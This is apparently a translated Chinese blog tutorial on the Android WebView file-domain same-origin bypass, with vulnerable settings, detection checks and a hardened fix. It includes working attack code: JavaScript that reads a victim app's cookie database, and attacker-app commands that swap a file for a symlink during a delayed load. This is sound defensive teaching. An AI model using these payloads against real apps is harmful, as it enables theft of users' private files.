Android Security Detection - WebView File Domain Same Origin Policy Bypass Vulnerability

In this chapter, we will learn about "WebView File Domain Same-Origin Policy Bypass Vulnerability".

1. Vulnerability principle

The vulnerability is that JavaScript running in a WebView from a file:// page can be made to read the victim application's private files. The same-origin check of the file protocol normally stops a file:// page from reading other local files, but a page is always allowed to read itself. If the JavaScript is executed with a delay, and during that delay the attacker deletes the HTML file and replaces it with a symbolic link pointing to another file, then re-reading the page's own URL returns the content of the file the symbolic link points to. Most applications that use WebView are affected. A malicious application without any special permission can use this to steal arbitrary private files of the target application; for browsers in particular this means passwords, cookies, bookmarks and browsing history, resulting in the leakage of sensitive information.
The essential ingredients are the symbolic link and the delayed load. The symbolic link is not the only route, though: there are two ways to trigger the vulnerability.

a. File cross-domain: JavaScript loaded from a file:// URL reads (accesses) other local files directly.
b. Bypassing the same-origin check of the file protocol: a symbolic link combined with delayed loading, as described above.

2. WebView related knowledge

1. Allowing WebView to load local files: WebSettings.setAllowFileAccess(boolean allow) (reached through WebView.getSettings()) controls whether the WebView may load file:// URLs at all. Its default is true up to Android 10 (API 29) and false from Android 11 (API 30).

2. Allowing the HTML loaded by WebView to run JavaScript: WebSettings.setJavaScriptEnabled(boolean enable) controls whether JavaScript executes (default false).

3. Allowing JavaScript loaded from a file:// URL to access local files: WebSettings.setAllowFileAccessFromFileURLs(boolean allow) or WebSettings.setAllowUniversalAccessFromFileURLs(boolean allow) controls whether JavaScript in the file domain may read other local files. The default is true on Android 4.0.3 (API 15) and below and false on later versions. Note that the two methods do not exist on Android 4.0 and below (they were added in API 16), and both are deprecated since API 30.

Note:
1. setAllowFileAccessFromFileURLs: whether JavaScript loaded via a file URL may read other local files.
2. setAllowUniversalAccessFromFileURLs: whether JavaScript loaded via a file URL may access any other origin, including other local files and http, https and other origins. Compared with setAllowFileAccessFromFileURLs it additionally allows cross-origin access to http and https links, and when it is true the value of setAllowFileAccessFromFileURLs is ignored.

3. Vulnerability scenarios

The typical scenario is: the APP has a WebView (browser functionality); the Activity hosting the WebView is exported (android:exported="true"); it receives a URL from outside and, without validating the URL, passes it straight to WebView.loadUrl; and the WebView is configured in one of the following ways.

1. File cross-domain: directly reading (accessing) local files
(1). JavaScript enabled: WebView.getSettings().setJavaScriptEnabled(true)
(2). File access enabled: WebView.getSettings().setAllowFileAccess(true)
(3). JavaScript from file URLs allowed to access local files: WebView.getSettings().setAllowFileAccessFromFileURLs(true) or WebView.getSettings().setAllowUniversalAccessFromFileURLs(true)

# Malicious app's HTML
<html>
<body></body>
<script>
function loadDatabase()
{
    // A private file of the victim app, read directly through the file domain
    var file_url = "file:///data/data/com.xxx.browser/databases/webviewCookies.db";
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.onload = function() {
        // Show the stolen content in the page and in an alert
        document.body.appendChild(document.createTextNode(xmlhttp.responseText));
        alert(xmlhttp.responseText);
    }
    xmlhttp.open("GET", file_url);
    xmlhttp.send(null);
}
loadDatabase();
</script>
</html>
# Victim app, vulnerable code
WebView webView = findViewById(R.id.webview);
webView.getSettings().setJavaScriptEnabled(true);
webView.getSettings().setAllowFileAccess(true);  // allow loading the file domain
webView.getSettings().setAllowFileAccessFromFileURLs(true);
// or webView.getSettings().setAllowUniversalAccessFromFileURLs(true);

Uri mUri = null;
String url = null;
Intent i = getIntent();
if (i != null) {
    mUri = i.getData(); // URI of the malicious HTML, received from another app
}
if (mUri != null) {
    url = mUri.toString();
}
if (url != null) {
    webView.loadUrl(url); // the malicious HTML is loaded without any validation
}

2. Bypassing the same-origin check of the file protocol: symbolic link and delayed loading
(1). JavaScript enabled: WebView.getSettings().setJavaScriptEnabled(true)
(2). File access enabled: WebView.getSettings().setAllowFileAccess(true)

In this case setAllowFileAccessFromFileURLs and setAllowUniversalAccessFromFileURLs are both false (the default on API 16 and above). No matter how strictly the same-origin check of the file protocol is configured, JavaScript on a file:// page can always read the page's own document, because document.URL is same-origin with itself. By delaying the JavaScript and, in the meantime, replacing the HTML file on disk with a symbolic link to another file, the script's re-read of its own URL returns the file the link points to.

# Malicious app's HTML; the target app loads it and runs the JS
<html>
<body></body>
<script>
var d = document;
function loadDatabase()
{
    // Read the page's own URL: always same-origin, so never blocked
    var file_url = d.URL;
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.onload = function() {
        document.body.appendChild(d.createTextNode(xmlhttp.responseText));
        alert(xmlhttp.responseText);
    }
    xmlhttp.open("GET", file_url);
    xmlhttp.send(null);
}
// Delay 8 seconds; by then the malicious app has swapped this file for a symlink
// to the victim's private file. The function reference must be passed, not
// loadDatabase(): calling it would run immediately and the race would be lost.
setTimeout(loadDatabase, 8000);
</script>
</html>
#恶意APP的攻击代码
  try {
    
     
  		String HTML = "恶意APP的HTML,在上面的HTML代码";
  		#新建文件夹,用于存放恶意HTML文件
       	cmdexec("mkdir /data/data/mm.xxxxx.testdemo3/files");
       	#将恶意HTML到恶意APP的沙盒目录
        cmdexec("echo \"" + HTML + "\" >  /data/data/mm.xxxxx.testdemo3/files/attack.html");
        #授权目录及其文件权限,允许其它应用访问
        cmdexec("chmod -R 777 /data/data/mm.xxxxx.testdemo3/files");
        Thread.sleep(1000);
        #启动被攻击的APP,并携带恶意HTML
        invokeVulnAPP("file://" + HTML_PATH);
        #延时6Thread.sleep(6000);
        #删除HTML文件
        cmdexec("rm " + HTML_PATH);
        #软链接文件,实现读取被攻击应用的private.txt文件
        cmdexec("ln -s " + "/data/data/mm.xxxxx.testdemo3/files/private.txt" + " " + HTML_PATH);
  } catch (Exception e) {
    
    
      // TODO: handle exception
  }
# Victim app, vulnerable code
WebView webView = findViewById(R.id.webview);
webView.getSettings().setJavaScriptEnabled(true);
webView.getSettings().setAllowFileAccess(true);  // allow loading the file domain

Uri mUri = null;
String url = null;
Intent i = getIntent();
if (i != null) {
    mUri = i.getData(); // URI of the malicious HTML, received from another app
}
if (mUri != null) {
    url = mUri.toString();
}
if (url != null) {
    webView.loadUrl(url); // the malicious HTML is loaded without any validation
}

4. POC

There is no detailed POC here; many articles on the Internet have these examples. The main thing I tested is which versions are affected by the variant produced by symbolic link and delayed loading.
The Android native emulator is used here for testing, which is relatively rough and is for reference only. (Some domestic custom ROMs have fixed this vulnerability.)

The versions tested range from Android 4.2 (API 17) to Android 7.0 (API 24). The result shows that the vulnerability is fixed in Android 7.0 (that Android 7.0 fixes it is only a guess, but in actual runs the attack did not take effect there; I estimate it is caused by the FileProvider introduced in Android 7.0, and the test code was also made compatible with FileProvider in the end), so the vulnerability affects roughly Android versions below 7.0 (API 24). It is not ruled out that there are fixes in minor versions above Android 6.0.


5. Detection method

They are not listed in detail here; the conditions that produce the vulnerability are spelled out in the scenarios above, so check for them accordingly: for each Activity that hosts a WebView, check whether it is exported, whether it passes an externally supplied URL (Intent data or extras) to loadUrl without validating the scheme, and whether setJavaScriptEnabled(true) and setAllowFileAccess(true) are set, with or without setAllowFileAccessFromFileURLs(true) / setAllowUniversalAccessFromFileURLs(true).
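As an added example (not code from the original post), the following Java helper turns those checks into a runtime audit that can be called from an instrumentation test or a debug build and reports which scenario from section 3 is reachable. The class name WebViewAudit and the wording of the findings are my own; the WebSettings getters, Build.VERSION_CODES.JELLY_BEAN and ActivityInfo.exported are standard Android APIs. Whether an external URL actually reaches loadUrl unvalidated cannot be seen from settings alone and still has to be confirmed by reading the Activity code.

```java
import android.app.Activity;
import android.content.ComponentName;
import android.content.pm.ActivityInfo;
import android.content.pm.PackageManager;
import android.os.Build;
import android.webkit.WebSettings;
import android.webkit.WebView;

import java.util.ArrayList;
import java.util.List;

// Added example: reports the WebView/Activity conditions from section 3.
// Class name and message texts are assumptions, not part of the original post.
public final class WebViewAudit {

    private WebViewAudit() {}

    // Returns every risky condition found. An empty list means none of the
    // preconditions for the file-domain vulnerability are present.
    public static List<String> audit(Activity activity, WebView webView) {
        List<String> findings = new ArrayList<>();
        WebSettings s = webView.getSettings();

        // (a) Is the hosting Activity reachable from other apps?
        boolean exported = false;
        try {
            ActivityInfo info = activity.getPackageManager().getActivityInfo(
                    new ComponentName(activity, activity.getClass()), 0);
            exported = info.exported;
        } catch (PackageManager.NameNotFoundException e) {
            findings.add("could not resolve ActivityInfo for " + activity.getClass().getName());
        }
        if (exported) {
            findings.add("Activity is exported (android:exported=\"true\")");
        }

        // (b) Settings common to both scenarios.
        boolean js = s.getJavaScriptEnabled();
        boolean fileAccess = s.getAllowFileAccess();
        if (js) findings.add("setJavaScriptEnabled(true)");
        if (fileAccess) findings.add("setAllowFileAccess(true): file:// pages can be loaded");

        // (c) Settings that turn scenario 2 (symlink race) into scenario 1 (direct read).
        boolean fileUrlJsAccess;
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN) {
            boolean fromFile = s.getAllowFileAccessFromFileURLs();
            boolean universal = s.getAllowUniversalAccessFromFileURLs();
            if (fromFile) findings.add("setAllowFileAccessFromFileURLs(true)");
            if (universal) findings.add("setAllowUniversalAccessFromFileURLs(true)");
            fileUrlJsAccess = fromFile || universal;
        } else {
            // Below API 16 the two setters do not exist and the behaviour is always on.
            findings.add("API < 16: JavaScript from file URLs can read other local files; "
                    + "WebSettings cannot turn this off");
            fileUrlJsAccess = true;
        }

        // (d) Summarise which scenario from section 3 is reachable.
        if (exported && js && fileAccess) {
            findings.add(fileUrlJsAccess
                    ? "scenario 1 reachable: file cross-domain read"
                    : "scenario 2 reachable: symlink + delayed load");
        }
        return findings;
    }
}
```

Call WebViewAudit.audit(this, webView) right after the settings are applied and fail the test if the returned list is not empty; the summary line at the end tells you whether the direct read or only the symlink race is possible.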

6. Repair method

1. Call setAllowFileAccess(false), and also setAllowFileAccessFromFileURLs(false) and setAllowUniversalAccessFromFileURLs(false) on API 16 and above, where they exist (they default to false there, but set them explicitly).
2. On Android 4.0 (API 15) and below the two FromFileURLs methods do not exist, so the file domain must be blocked another way: validate the incoming URL (for example, allow only http/https to known hosts) before passing it to loadUrl, and re-check in WebViewClient.shouldOverrideUrlLoading.
3. If the Activity hosting the WebView does not need to be exported, set android:exported="false" so that it cannot receive URLs from other apps.
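As an added example (not the original post's code), here is a hardened form of the vulnerable Activity from section 3 that applies all three fixes. The class name SafeWebViewActivity, the layout and view ids, and the allowlisted host www.example.com are assumptions; the Android APIs used are standard. The manifest entry for this Activity should additionally carry android:exported="false" unless other apps genuinely need to open it.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Build;
import android.os.Bundle;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

// Added example: hardened replacement for the vulnerable Activity in section 3.
// Class name, resource ids and the allowlisted host are assumptions.
public class SafeWebViewActivity extends Activity {

    // Only these hosts may be loaded; everything else is rejected.
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("www.example.com"));

    // True only for https URLs whose host is on the allowlist. This rejects
    // file://, content://, javascript:, data: and any other scheme, in any case.
    static boolean isAllowedUrl(String url) {
        if (url == null) return false;
        Uri uri = Uri.parse(url);
        String scheme = uri.getScheme();
        if (scheme == null || !scheme.equalsIgnoreCase("https")) return false;
        String host = uri.getHost();
        return host != null && ALLOWED_HOSTS.contains(host.toLowerCase());
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        WebView webView = (WebView) findViewById(R.id.webview);
        WebSettings s = webView.getSettings();

        // Fix 1: no file domain at all, and no content:// either.
        s.setAllowFileAccess(false);
        s.setAllowContentAccess(false);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN) {
            s.setAllowFileAccessFromFileURLs(false);
            s.setAllowUniversalAccessFromFileURLs(false);
        }
        // Enable JavaScript only if the allowlisted pages really need it.
        s.setJavaScriptEnabled(false);

        // Fix 2: re-check every navigation, not just the first load, so a
        // redirect or link on an allowed page cannot reach the file domain.
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !isAllowedUrl(url); // returning true blocks the navigation
            }
        });

        // The externally supplied URL goes through the same check before loadUrl.
        Intent i = getIntent();
        Uri data = (i != null) ? i.getData() : null;
        String url = (data != null) ? data.toString() : null;
        if (isAllowedUrl(url)) {
            webView.loadUrl(url);
        } else {
            finish(); // refuse to load anything that is not on the allowlist
        }
    }
}
```

isAllowedUrl is the single choke point: it is applied both to the Intent data and inside shouldOverrideUrlLoading, so the pre-API-16 case (fix 2 above) is covered by the scheme check rather than by settings that do not exist there.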


asjhan for Android reverse

Origin: blog.csdn.net/qq_35993502/article/details/121371049